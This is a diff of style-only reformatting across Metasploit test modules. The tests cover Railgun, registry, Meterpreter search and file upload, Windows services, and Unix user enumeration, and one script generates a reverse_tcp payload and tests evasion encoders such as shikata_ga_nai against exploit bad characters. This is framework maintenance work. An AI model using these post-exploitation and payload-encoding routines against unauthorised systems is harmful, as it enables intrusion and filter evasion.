remote = "#{datastore["BaseFileName"]}-file#{entropy_value}.txt"
|
remote = "#{datastore["BaseFileName"]}-file#{entropy_value}.txt"
|
||||||
vprint_status("Remote File Name: #{remote}")
|
vprint_status("Remote File Name: #{remote}")
|
||||||
local = __FILE__
|
local = __FILE__
|
||||||
vprint_status("uploading")
|
vprint_status("uploading")
|
||||||
session.fs.file.upload_file(remote, local)
|
session.fs.file.upload_file(remote, local)
|
||||||
vprint_status("done")
|
vprint_status("done")
|
||||||
|
@ -333,7 +334,7 @@ class MetasploitModule < Msf::Post
|
||||||
res = true
|
res = true
|
||||||
remote = "#{datastore["BaseFileName"]}-file#{entropy_value}.txt"
|
remote = "#{datastore["BaseFileName"]}-file#{entropy_value}.txt"
|
||||||
vprint_status("Remote File Name: #{remote}")
|
vprint_status("Remote File Name: #{remote}")
|
||||||
local = __FILE__
|
local = __FILE__
|
||||||
vprint_status("uploading")
|
vprint_status("uploading")
|
||||||
session.fs.file.upload_file(remote, local)
|
session.fs.file.upload_file(remote, local)
|
||||||
vprint_status("done")
|
vprint_status("done")
|
||||||
|
@ -342,20 +343,19 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
if res
|
if res
|
||||||
remote_md5 = session.fs.file.md5(remote)
|
remote_md5 = session.fs.file.md5(remote)
|
||||||
local_md5 = Digest::MD5.digest(::File.read(local, mode: 'rb'))
|
local_md5 = Digest::MD5.digest(::File.read(local, mode: 'rb'))
|
||||||
remote_sha = session.fs.file.sha1(remote)
|
remote_sha = session.fs.file.sha1(remote)
|
||||||
local_sha = Digest::SHA1.digest(::File.read(local, mode: 'rb'))
|
local_sha = Digest::SHA1.digest(::File.read(local, mode: 'rb'))
|
||||||
vprint_status("remote md5: #{Rex::Text.to_hex(remote_md5,'')}")
|
vprint_status("remote md5: #{Rex::Text.to_hex(remote_md5, '')}")
|
||||||
vprint_status("local md5 : #{Rex::Text.to_hex(local_md5,'')}")
|
vprint_status("local md5 : #{Rex::Text.to_hex(local_md5, '')}")
|
||||||
vprint_status("remote sha: #{Rex::Text.to_hex(remote_sha,'')}")
|
vprint_status("remote sha: #{Rex::Text.to_hex(remote_sha, '')}")
|
||||||
vprint_status("local sha : #{Rex::Text.to_hex(local_sha,'')}")
|
vprint_status("local sha : #{Rex::Text.to_hex(local_sha, '')}")
|
||||||
res &&= (remote_md5 == local_md5)
|
res &&= (remote_md5 == local_md5)
|
||||||
end
|
end
|
||||||
|
|
||||||
session.fs.file.rm(remote)
|
session.fs.file.rm(remote)
|
||||||
res
|
res
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
=begin
|
=begin
|
||||||
|
@ -387,7 +387,7 @@ class MetasploitModule < Msf::Post
|
||||||
super
|
super
|
||||||
end
|
end
|
||||||
|
|
||||||
protected
|
protected
|
||||||
|
|
||||||
def create_directory(name)
|
def create_directory(name)
|
||||||
res = true
|
res = true
|
||||||
|
@ -403,5 +403,4 @@ protected
|
||||||
res
|
res
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -1,5 +1,3 @@
|
||||||
|
|
||||||
|
|
||||||
lib = File.join(Msf::Config.install_root, "test", "lib")
|
lib = File.join(Msf::Config.install_root, "test", "lib")
|
||||||
require 'module_test'
|
require 'module_test'
|
||||||
|
|
||||||
|
@ -9,14 +7,17 @@ class MetasploitModule < Msf::Post
|
||||||
include Msf::Post::File
|
include Msf::Post::File
|
||||||
include Msf::Post::Windows::FileInfo
|
include Msf::Post::Windows::FileInfo
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super( update_info( info,
|
super(
|
||||||
'Name' => 'Railgun API Tests',
|
update_info(
|
||||||
'Description' => %q{ This module will test railgun api functions },
|
info,
|
||||||
'License' => MSF_LICENSE,
|
'Name' => 'Railgun API Tests',
|
||||||
'Author' => [ 'Spencer McIntyre' ],
|
'Description' => %q{ This module will test railgun api functions },
|
||||||
'Platform' => [ 'linux', 'osx', 'windows' ]
|
'License' => MSF_LICENSE,
|
||||||
))
|
'Author' => [ 'Spencer McIntyre' ],
|
||||||
|
'Platform' => [ 'linux', 'osx', 'windows' ]
|
||||||
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_api_function_calls_libc
|
def test_api_function_calls_libc
|
||||||
|
@ -89,6 +90,7 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
def test_api_function_file_info_windows
|
def test_api_function_file_info_windows
|
||||||
return unless session.platform == 'windows'
|
return unless session.platform == 'windows'
|
||||||
|
|
||||||
it "Should retrieve the win32k file version" do
|
it "Should retrieve the win32k file version" do
|
||||||
path = expand_path('%WINDIR%\\system32\\win32k.sys')
|
path = expand_path('%WINDIR%\\system32\\win32k.sys')
|
||||||
major, minor, build, revision, brand = file_version(path)
|
major, minor, build, revision, brand = file_version(path)
|
||||||
|
@ -98,6 +100,7 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
def test_api_function_calls_windows
|
def test_api_function_calls_windows
|
||||||
return unless session.platform == 'windows'
|
return unless session.platform == 'windows'
|
||||||
|
|
||||||
it "Should include error information in the results" do
|
it "Should include error information in the results" do
|
||||||
ret = true
|
ret = true
|
||||||
result = session.railgun.kernel32.GetCurrentProcess()
|
result = session.railgun.kernel32.GetCurrentProcess()
|
||||||
|
|
|
@ -1,4 +1,3 @@
|
||||||
|
|
||||||
##
|
##
|
||||||
# This module requires Metasploit: https://metasploit.com/download
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
@ -14,43 +13,45 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
include Msf::ModuleTest::PostTest
|
include Msf::ModuleTest::PostTest
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super( update_info( info,
|
super(
|
||||||
'Name' => 'railgun_testing',
|
update_info(
|
||||||
'Description' => %q{ This module will test railgun code used in post modules},
|
info,
|
||||||
'License' => MSF_LICENSE,
|
'Name' => 'railgun_testing',
|
||||||
'Author' => [ 'kernelsmith'],
|
'Description' => %q{ This module will test railgun code used in post modules},
|
||||||
'Platform' => [ 'windows' ]
|
'License' => MSF_LICENSE,
|
||||||
))
|
'Author' => [ 'kernelsmith'],
|
||||||
|
'Platform' => [ 'windows' ]
|
||||||
|
)
|
||||||
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptInt.new("ERR_CODE", [ false, "Error code to reverse lookup" ]),
|
OptInt.new("ERR_CODE", [ false, "Error code to reverse lookup" ]),
|
||||||
OptInt.new("WIN_CONST", [ false, "Windows constant to reverse lookup" ]),
|
OptInt.new("WIN_CONST", [ false, "Windows constant to reverse lookup" ]),
|
||||||
OptRegexp.new("WCREGEX", [ false, "Regexp to apply to constant rev lookup" ]),
|
OptRegexp.new("WCREGEX", [ false, "Regexp to apply to constant rev lookup" ]),
|
||||||
OptRegexp.new("ECREGEX", [ false, "Regexp to apply to error code lookup" ]),
|
OptRegexp.new("ECREGEX", [ false, "Regexp to apply to error code lookup" ]),
|
||||||
], self.class)
|
], self.class
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Return an array of windows constants names matching +winconst+
|
# Return an array of windows constants names matching +winconst+
|
||||||
#
|
#
|
||||||
def select_const_names(winconst, filter_regex=nil)
|
def select_const_names(winconst, filter_regex = nil)
|
||||||
session.railgun.constant_manager.select_const_names(winconst, filter_regex)
|
session.railgun.constant_manager.select_const_names(winconst, filter_regex)
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Returns an array of windows error code names for a given windows error code matching +err_code+
|
# Returns an array of windows error code names for a given windows error code matching +err_code+
|
||||||
#
|
#
|
||||||
def lookup_error(err_code, filter_regex=nil)
|
def lookup_error(err_code, filter_regex = nil)
|
||||||
select_const_names(err_code, /^ERROR_/).select do |name|
|
select_const_names(err_code, /^ERROR_/).select do |name|
|
||||||
name =~ filter_regex
|
name =~ filter_regex
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_static
|
def test_static
|
||||||
|
|
||||||
it "should return a constant name given a const and a filter" do
|
it "should return a constant name given a const and a filter" do
|
||||||
ret = true
|
ret = true
|
||||||
results = select_const_names(4, /^SERVICE/)
|
results = select_const_names(4, /^SERVICE/)
|
||||||
|
@ -78,16 +79,14 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
ret
|
ret
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_datastore
|
def test_datastore
|
||||||
|
|
||||||
if (datastore["WIN_CONST"])
|
if (datastore["WIN_CONST"])
|
||||||
it "should look up arbitrary constants" do
|
it "should look up arbitrary constants" do
|
||||||
ret = true
|
ret = true
|
||||||
results = select_const_names(datastore['WIN_CONST'], datastore['WCREGEX'])
|
results = select_const_names(datastore['WIN_CONST'], datastore['WCREGEX'])
|
||||||
#vprint_status("RESULTS: #{results.class} #{results.pretty_inspect}")
|
# vprint_status("RESULTS: #{results.class} #{results.pretty_inspect}")
|
||||||
|
|
||||||
ret
|
ret
|
||||||
end
|
end
|
||||||
|
@ -97,13 +96,10 @@ class MetasploitModule < Msf::Post
|
||||||
it "should look up arbitrary error codes" do
|
it "should look up arbitrary error codes" do
|
||||||
ret = true
|
ret = true
|
||||||
results = lookup_error(datastore['ERR_CODE'], datastore['ECREGEX'])
|
results = lookup_error(datastore['ERR_CODE'], datastore['ECREGEX'])
|
||||||
#vprint_status("RESULTS: #{results.class} #{results.inspect}")
|
# vprint_status("RESULTS: #{results.class} #{results.inspect}")
|
||||||
|
|
||||||
ret
|
ret
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -1,4 +1,3 @@
|
||||||
|
|
||||||
##
|
##
|
||||||
# This module requires Metasploit: https://metasploit.com/download
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
@ -15,23 +14,26 @@ class MetasploitModule < Msf::Post
|
||||||
include Msf::ModuleTest::PostTest
|
include Msf::ModuleTest::PostTest
|
||||||
include Msf::Post::Windows::Registry
|
include Msf::Post::Windows::Registry
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super( update_info( info,
|
super(
|
||||||
'Name' => 'registry_post_testing',
|
update_info(
|
||||||
'Description' => %q{ This module will test Post::Windows::Registry API methods },
|
info,
|
||||||
'License' => MSF_LICENSE,
|
'Name' => 'registry_post_testing',
|
||||||
'Author' => [
|
'Description' => %q{ This module will test Post::Windows::Registry API methods },
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Author' => [
|
||||||
'kernelsmith', # original
|
'kernelsmith', # original
|
||||||
'egypt', # PostTest conversion
|
'egypt', # PostTest conversion
|
||||||
],
|
],
|
||||||
'Platform' => [ 'windows' ]
|
'Platform' => [ 'windows' ]
|
||||||
))
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_0_registry_read
|
def test_0_registry_read
|
||||||
it "should evaluate key existence" do
|
it "should evaluate key existence" do
|
||||||
k_exists = registry_key_exist?(%q#HKCU\Environment#)
|
k_exists = registry_key_exist?(%q#HKCU\Environment#)
|
||||||
k_dne = registry_key_exist?(%q#HKLM\\Non\Existent\Key#)
|
k_dne = registry_key_exist?(%q#HKLM\\Non\Existent\Key#)
|
||||||
|
|
||||||
(k_exists && !k_dne)
|
(k_exists && !k_dne)
|
||||||
end
|
end
|
||||||
|
@ -39,7 +41,7 @@ class MetasploitModule < Msf::Post
|
||||||
pending "should evaluate value existence" do
|
pending "should evaluate value existence" do
|
||||||
# these methods are not implemented
|
# these methods are not implemented
|
||||||
v_exists = registry_value_exist?(%q#HKCU\Environment#, "TEMP")
|
v_exists = registry_value_exist?(%q#HKCU\Environment#, "TEMP")
|
||||||
v_dne = registry_value_exist?(%q#HKLM\\Non\Existent\Key#, "asdf")
|
v_dne = registry_value_exist?(%q#HKLM\\Non\Existent\Key#, "asdf")
|
||||||
|
|
||||||
(v_exists && !v_dne)
|
(v_exists && !v_dne)
|
||||||
end
|
end
|
||||||
|
@ -99,7 +101,6 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
ret
|
ret
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_1_registry_write
|
def test_1_registry_write
|
||||||
|
@ -172,7 +173,6 @@ class MetasploitModule < Msf::Post
|
||||||
ret
|
ret
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
it "should delete unicode keys" do
|
it "should delete unicode keys" do
|
||||||
ret = registry_deleteval(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str")
|
ret = registry_deleteval(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str")
|
||||||
valinfo = registry_getvalinfo(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str")
|
valinfo = registry_getvalinfo(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str")
|
||||||
|
@ -185,9 +185,6 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
ret
|
ret
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -1,4 +1,3 @@
|
||||||
|
|
||||||
require 'rex/post/meterpreter/extensions/stdapi/command_ids'
|
require 'rex/post/meterpreter/extensions/stdapi/command_ids'
|
||||||
require 'rex'
|
require 'rex'
|
||||||
|
|
||||||
|
@ -10,20 +9,24 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
include Msf::ModuleTest::PostTest
|
include Msf::ModuleTest::PostTest
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super( update_info( info,
|
super(
|
||||||
'Name' => 'Testing Meterpreter Search',
|
update_info(
|
||||||
'Description' => %q{ This module will test the meterpreter search method },
|
info,
|
||||||
'License' => MSF_LICENSE,
|
'Name' => 'Testing Meterpreter Search',
|
||||||
'Author' => [ 'timwr'],
|
'Description' => %q{ This module will test the meterpreter search method },
|
||||||
'Platform' => [ 'windows', 'linux', 'java' ],
|
'License' => MSF_LICENSE,
|
||||||
'SessionTypes' => [ 'meterpreter' ]
|
'Author' => [ 'timwr'],
|
||||||
))
|
'Platform' => [ 'windows', 'linux', 'java' ],
|
||||||
|
'SessionTypes' => [ 'meterpreter' ]
|
||||||
|
)
|
||||||
|
)
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptBool.new("AddEntropy" , [false, "Add entropy token to file and directory names.", false]),
|
OptBool.new("AddEntropy", [false, "Add entropy token to file and directory names.", false]),
|
||||||
OptString.new("BaseFileName" , [true, "File/dir base name", "meterpreter-test"])
|
OptString.new("BaseFileName", [true, "File/dir base name", "meterpreter-test"])
|
||||||
], self.class)
|
], self.class
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def setup
|
def setup
|
||||||
|
@ -38,7 +41,7 @@ class MetasploitModule < Msf::Post
|
||||||
session.fs.dir.chdir(tmp)
|
session.fs.dir.chdir(tmp)
|
||||||
|
|
||||||
if datastore["AddEntropy"]
|
if datastore["AddEntropy"]
|
||||||
entropy_value = '-' + ('a'..'z').to_a.shuffle[0,8].join
|
entropy_value = '-' + ('a'..'z').to_a.shuffle[0, 8].join
|
||||||
else
|
else
|
||||||
entropy_value = ""
|
entropy_value = ""
|
||||||
end
|
end
|
||||||
|
|
|
@ -13,27 +13,31 @@ class MetasploitModule < Msf::Post
|
||||||
include Msf::Post::Windows::Services
|
include Msf::Post::Windows::Services
|
||||||
include Msf::ModuleTest::PostTest
|
include Msf::ModuleTest::PostTest
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super( update_info( info,
|
super(
|
||||||
'Name' => 'Test Post::Windows::Services',
|
update_info(
|
||||||
'Description' => %q{ This module will test windows services methods within a shell},
|
info,
|
||||||
'License' => MSF_LICENSE,
|
'Name' => 'Test Post::Windows::Services',
|
||||||
'Author' => [ 'kernelsmith', 'egypt' ],
|
'Description' => %q{ This module will test windows services methods within a shell},
|
||||||
'Platform' => [ 'windows' ],
|
'License' => MSF_LICENSE,
|
||||||
'SessionTypes' => [ 'meterpreter', 'shell' ]
|
'Author' => [ 'kernelsmith', 'egypt' ],
|
||||||
))
|
'Platform' => [ 'windows' ],
|
||||||
|
'SessionTypes' => [ 'meterpreter', 'shell' ]
|
||||||
|
)
|
||||||
|
)
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptString.new("QSERVICE" , [true, "Service (keyname) to query", "winmgmt"]),
|
OptString.new("QSERVICE", [true, "Service (keyname) to query", "winmgmt"]),
|
||||||
OptString.new("NSERVICE" , [true, "New Service (keyname) to create/del", "testes"]),
|
OptString.new("NSERVICE", [true, "New Service (keyname) to create/del", "testes"]),
|
||||||
OptString.new("SSERVICE" , [true, "Service (keyname) to start/stop", "W32Time"]),
|
OptString.new("SSERVICE", [true, "Service (keyname) to start/stop", "W32Time"]),
|
||||||
OptString.new("DNAME" , [true, "Display name used for create test", "Cool display name"]),
|
OptString.new("DNAME", [true, "Display name used for create test", "Cool display name"]),
|
||||||
OptString.new("BINPATH" , [true, "Binary path for create test", "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs"]),
|
OptString.new("BINPATH", [true, "Binary path for create test", "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs"]),
|
||||||
OptEnum.new("MODE", [true, "Mode to use for startup/create tests", "auto",
|
OptEnum.new("MODE", [
|
||||||
["auto", "manual", "disable"]
|
true, "Mode to use for startup/create tests", "auto",
|
||||||
]),
|
["auto", "manual", "disable"]
|
||||||
], self.class)
|
]),
|
||||||
|
], self.class
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_start
|
def test_start
|
||||||
|
@ -65,7 +69,7 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
ret &&= results.kind_of? Array
|
ret &&= results.kind_of? Array
|
||||||
ret &&= results.length > 0
|
ret &&= results.length > 0
|
||||||
ret &&= results.select{|service| service[:name] == datastore["QSERVICE"]}
|
ret &&= results.select { |service| service[:name] == datastore["QSERVICE"] }
|
||||||
|
|
||||||
ret
|
ret
|
||||||
end
|
end
|
||||||
|
@ -92,11 +96,11 @@ class MetasploitModule < Msf::Post
|
||||||
def test_create
|
def test_create
|
||||||
it "should create a service #{datastore["NSERVICE"]}" do
|
it "should create a service #{datastore["NSERVICE"]}" do
|
||||||
mode = case datastore["MODE"]
|
mode = case datastore["MODE"]
|
||||||
when "disable"; START_TYPE_DISABLED
|
when "disable"; START_TYPE_DISABLED
|
||||||
when "manual"; START_TYPE_MANUAL
|
when "manual"; START_TYPE_MANUAL
|
||||||
when "auto"; START_TYPE_AUTO
|
when "auto"; START_TYPE_AUTO
|
||||||
else; START_TYPE AUTO
|
else; START_TYPE AUTO
|
||||||
end
|
end
|
||||||
|
|
||||||
ret = service_create(datastore['NSERVICE'],
|
ret = service_create(datastore['NSERVICE'],
|
||||||
display: datastore['DNAME'],
|
display: datastore['DNAME'],
|
||||||
|
@ -151,16 +155,16 @@ class MetasploitModule < Msf::Post
|
||||||
ret = true
|
ret = true
|
||||||
|
|
||||||
results = service_create(service_name,
|
results = service_create(service_name,
|
||||||
display: display_name,
|
display: display_name,
|
||||||
path: datastore['BINPATH'],
|
path: datastore['BINPATH'],
|
||||||
starttype: START_TYPE_DISABLED)
|
starttype: START_TYPE_DISABLED)
|
||||||
|
|
||||||
ret &&= (results == Windows::Error::SUCCESS)
|
ret &&= (results == Windows::Error::SUCCESS)
|
||||||
results = service_status(service_name)
|
results = service_status(service_name)
|
||||||
ret &&= results.kind_of? Hash
|
ret &&= results.kind_of? Hash
|
||||||
if ret
|
if ret
|
||||||
original_display = results[:display]
|
original_display = results[:display]
|
||||||
results = service_change_config(service_name, {:display => Rex::Text.rand_text_alpha(5)})
|
results = service_change_config(service_name, { :display => Rex::Text.rand_text_alpha(5) })
|
||||||
ret &&= (results == Windows::Error::SUCCESS)
|
ret &&= (results == Windows::Error::SUCCESS)
|
||||||
|
|
||||||
results = service_info(service_name)
|
results = service_info(service_name)
|
||||||
|
@ -181,9 +185,9 @@ class MetasploitModule < Msf::Post
|
||||||
it "should start a disabled service #{service_name}" do
|
it "should start a disabled service #{service_name}" do
|
||||||
ret = true
|
ret = true
|
||||||
results = service_create(service_name,
|
results = service_create(service_name,
|
||||||
display: display_name,
|
display: display_name,
|
||||||
path: datastore['BINPATH'],
|
path: datastore['BINPATH'],
|
||||||
starttype: START_TYPE_DISABLED)
|
starttype: START_TYPE_DISABLED)
|
||||||
|
|
||||||
ret &&= (results == Windows::Error::SUCCESS)
|
ret &&= (results == Windows::Error::SUCCESS)
|
||||||
if ret
|
if ret
|
||||||
|
|
|
@ -1,12 +1,11 @@
|
||||||
|
|
||||||
lib = File.join(Msf::Config.install_root, "test", "lib")
|
lib = File.join(Msf::Config.install_root, "test", "lib")
|
||||||
$:.push(lib) unless $:.include?(lib)
|
$:.push(lib) unless $:.include?(lib)
|
||||||
require 'module_test'
|
require 'module_test'
|
||||||
|
|
||||||
#load 'test/lib/module_test.rb'
|
# load 'test/lib/module_test.rb'
|
||||||
#load 'lib/rex/text.rb'
|
# load 'lib/rex/text.rb'
|
||||||
#load 'lib/msf/core/post/linux/system.rb'
|
# load 'lib/msf/core/post/linux/system.rb'
|
||||||
#load 'lib/msf/core/post/unix/enum_user_dirs.rb'
|
# load 'lib/msf/core/post/unix/enum_user_dirs.rb'
|
||||||
|
|
||||||
class MetasploitModule < Msf::Post
|
class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
|
@ -15,15 +14,18 @@ class MetasploitModule < Msf::Post
|
||||||
include Msf::Post::Unix
|
include Msf::Post::Unix
|
||||||
include Msf::Post::Common
|
include Msf::Post::Common
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super( update_info( info,
|
super(
|
||||||
'Name' => 'Testing Remote Unix System Manipulation',
|
update_info(
|
||||||
'Description' => %q{ This module will test Post::File API methods },
|
info,
|
||||||
'License' => MSF_LICENSE,
|
'Name' => 'Testing Remote Unix System Manipulation',
|
||||||
'Author' => [ 'egypt'],
|
'Description' => %q{ This module will test Post::File API methods },
|
||||||
'Platform' => [ 'linux', 'java' ],
|
'License' => MSF_LICENSE,
|
||||||
'SessionTypes' => [ 'meterpreter', 'shell' ]
|
'Author' => [ 'egypt'],
|
||||||
))
|
'Platform' => [ 'linux', 'java' ],
|
||||||
|
'SessionTypes' => [ 'meterpreter', 'shell' ]
|
||||||
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_unix
|
def test_unix
|
||||||
|
@ -36,6 +38,7 @@ class MetasploitModule < Msf::Post
|
||||||
if ret
|
if ret
|
||||||
users.each { |u|
|
users.each { |u|
|
||||||
next unless u[:name] == "root"
|
next unless u[:name] == "root"
|
||||||
|
|
||||||
have_root = true
|
have_root = true
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
|
@ -44,8 +47,6 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
ret
|
ret
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -6,7 +6,7 @@ describe Msf::Simple::Framework do
|
||||||
klass = mod
|
klass = mod
|
||||||
it "should be able create #{ref}" do
|
it "should be able create #{ref}" do
|
||||||
e = $msf.modules.create(ref)
|
e = $msf.modules.create(ref)
|
||||||
e.should_not == nil
|
e.should_not == nil
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -1,7 +1,6 @@
|
||||||
require 'rubygems'
|
require 'rubygems'
|
||||||
require 'spec/rake/spectask'
|
require 'spec/rake/spectask'
|
||||||
Spec::Rake::SpecTask.new do |t|
|
Spec::Rake::SpecTask.new do |t|
|
||||||
t.ruby_opts = ['-rtest/unit']
|
t.ruby_opts = ['-rtest/unit']
|
||||||
t.spec_files = FileList['*_test.rb']
|
t.spec_files = FileList['*_test.rb']
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
#
|
#
|
||||||
# Simple script to test a group of encoders against every exploit in the framework,
|
# Simple script to test a group of encoders against every exploit in the framework,
|
||||||
# specifically for the exploits badchars, to see if a payload can be encoded. We ignore
|
# specifically for the exploits badchars, to see if a payload can be encoded. We ignore
|
||||||
# the target arch/platform of the exploit as we just want to pull out real world bad chars.
|
# the target arch/platform of the exploit as we just want to pull out real world bad chars.
|
||||||
#
|
#
|
||||||
|
@ -17,101 +17,92 @@ $msf = Msf::Simple::Framework.create
|
||||||
|
|
||||||
EXPLOITS = $msf.exploits
|
EXPLOITS = $msf.exploits
|
||||||
|
|
||||||
def print_line( message )
|
def print_line(message)
|
||||||
$stdout.puts( message )
|
$stdout.puts(message)
|
||||||
end
|
end
|
||||||
|
|
||||||
def format_badchars( badchars )
|
def format_badchars(badchars)
|
||||||
str = ''
|
str = ''
|
||||||
if( badchars )
|
if (badchars)
|
||||||
badchars.each_byte do | b |
|
badchars.each_byte do |b|
|
||||||
str << "\\x%02X" % [ b ]
|
str << "\\x%02X" % [ b ]
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
str
|
str
|
||||||
end
|
end
|
||||||
|
|
||||||
def encoder_v_payload( encoder_name, payload, verbose=false )
|
def encoder_v_payload(encoder_name, payload, verbose = false)
|
||||||
success = 0
|
success = 0
|
||||||
fail = 0
|
fail = 0
|
||||||
EXPLOITS.each_module do | name, mod |
|
EXPLOITS.each_module do |name, mod|
|
||||||
|
|
||||||
exploit = mod.new
|
exploit = mod.new
|
||||||
print_line( "\n#{encoder_name} v #{name} (#{ format_badchars( exploit.payload_badchars ) })" ) if verbose
|
print_line("\n#{encoder_name} v #{name} (#{format_badchars(exploit.payload_badchars)})") if verbose
|
||||||
begin
|
begin
|
||||||
encoder = $msf.encoders.create( encoder_name )
|
encoder = $msf.encoders.create(encoder_name)
|
||||||
raw = encoder.encode( payload, exploit.payload_badchars, nil, nil )
|
raw = encoder.encode(payload, exploit.payload_badchars, nil, nil)
|
||||||
success += 1
|
success += 1
|
||||||
rescue
|
rescue
|
||||||
print_line( " FAILED! badchars=#{ format_badchars( exploit.payload_badchars ) }\n" ) if verbose
|
print_line(" FAILED! badchars=#{format_badchars(exploit.payload_badchars)}\n") if verbose
|
||||||
fail += 1
|
fail += 1
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
return [ success, fail ]
|
return [ success, fail ]
|
||||||
end
|
end
|
||||||
|
|
||||||
def generate_payload( name )
|
def generate_payload(name)
|
||||||
|
payload = $msf.payloads.create(name)
|
||||||
|
|
||||||
payload = $msf.payloads.create( name )
|
|
||||||
|
|
||||||
# set options for a reverse_tcp payload
|
# set options for a reverse_tcp payload
|
||||||
payload.datastore['LHOST'] = '192.168.2.1'
|
payload.datastore['LHOST'] = '192.168.2.1'
|
||||||
payload.datastore['RHOST'] = '192.168.2.254'
|
payload.datastore['RHOST'] = '192.168.2.254'
|
||||||
payload.datastore['RPORT'] = '5432'
|
payload.datastore['RPORT'] = '5432'
|
||||||
payload.datastore['LPORT'] = '4444'
|
payload.datastore['LPORT'] = '4444'
|
||||||
# set options for an exec payload
|
# set options for an exec payload
|
||||||
payload.datastore['CMD'] = 'calc'
|
payload.datastore['CMD'] = 'calc'
|
||||||
# set generic options
|
# set generic options
|
||||||
payload.datastore['EXITFUNC'] = 'thread'
|
payload.datastore['EXITFUNC'] = 'thread'
|
||||||
|
|
||||||
return payload.generate
|
return payload.generate
|
||||||
end
|
end
|
||||||
|
|
||||||
def run( encoders, payload_name, verbose=false )
|
def run(encoders, payload_name, verbose = false)
|
||||||
|
payload = generate_payload(payload_name)
|
||||||
payload = generate_payload( payload_name )
|
|
||||||
|
|
||||||
table = Rex::Text::Table.new(
|
table = Rex::Text::Table.new(
|
||||||
'Header' => 'Encoder v Payload Test - ' + ::Time.new.strftime( "%d-%b-%Y %H:%M:%S" ),
|
'Header' => 'Encoder v Payload Test - ' + ::Time.new.strftime("%d-%b-%Y %H:%M:%S"),
|
||||||
'Indent' => 4,
|
'Indent' => 4,
|
||||||
'Columns' => [ 'Encoder Name', 'Success', 'Fail' ]
|
'Columns' => [ 'Encoder Name', 'Success', 'Fail' ]
|
||||||
)
|
)
|
||||||
|
|
||||||
encoders.each do | encoder_name |
|
encoders.each do |encoder_name|
|
||||||
|
success, fail = encoder_v_payload(encoder_name, payload, verbose)
|
||||||
success, fail = encoder_v_payload( encoder_name, payload, verbose )
|
|
||||||
|
|
||||||
table << [ encoder_name, success, fail ]
|
table << [ encoder_name, success, fail ]
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
return table
|
return table
|
||||||
end
|
end
|
||||||
|
|
||||||
if( $0 == __FILE__ )
|
if ($0 == __FILE__)
|
||||||
|
|
||||||
print_line( "[+] Starting.\n" )
|
print_line("[+] Starting.\n")
|
||||||
|
|
||||||
encoders = [
|
encoders = [
|
||||||
'x86/bloxor',
|
'x86/bloxor',
|
||||||
'x86/shikata_ga_nai',
|
'x86/shikata_ga_nai',
|
||||||
'x86/jmp_call_additive',
|
'x86/jmp_call_additive',
|
||||||
'x86/fnstenv_mov',
|
